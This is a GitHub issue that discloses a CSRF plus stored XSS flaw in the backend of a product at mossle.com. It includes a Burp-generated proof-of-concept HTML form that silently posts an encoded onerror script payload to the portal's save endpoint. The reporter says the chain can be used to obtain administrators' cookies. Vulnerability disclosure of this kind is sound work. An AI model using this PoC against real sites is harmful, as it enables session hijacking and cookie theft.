Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Csrf + Xss combination Can be obtained user cookie #199

Open
unknownerror-bot opened this issue Oct 15, 2019 · 0 comments
Open

Csrf + Xss combination Can be obtained user cookie #199

unknownerror-bot opened this issue Oct 15, 2019 · 0 comments

Comments

@unknownerror-bot
Copy link

unknownerror-bot commented Oct 15, 2019
edited
Loading

Product Homepage: http://www.mossle.com/index.do
Place of backstage exists Csrf Vulnerability,attacker Structure a csrf payload,Once the administrator clicks on the malicious link, the component information is automatically add.
There is an xss in the place of Editing component

1571127417546

We can write an xss first, and then construct the csrf code, so that after the account clicks on the malicious link of the attacker, it will execute csrf, and the website will have an xss. As long as the account visits the page , he can get him Cookie

Csrf Exp:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://www.mossle.com/portal/save.do" method="POST">
      <input type="hidden" name="portalWidgetId" value="5557079425024" />
      <input type="hidden" name="portalItemName" value="&lt;img&#32;src&#61;x&#32;onerror&#61;alert&#40;&apos;cookie&apos;&#41;&gt;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

1571127847476
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@unknownerror-bot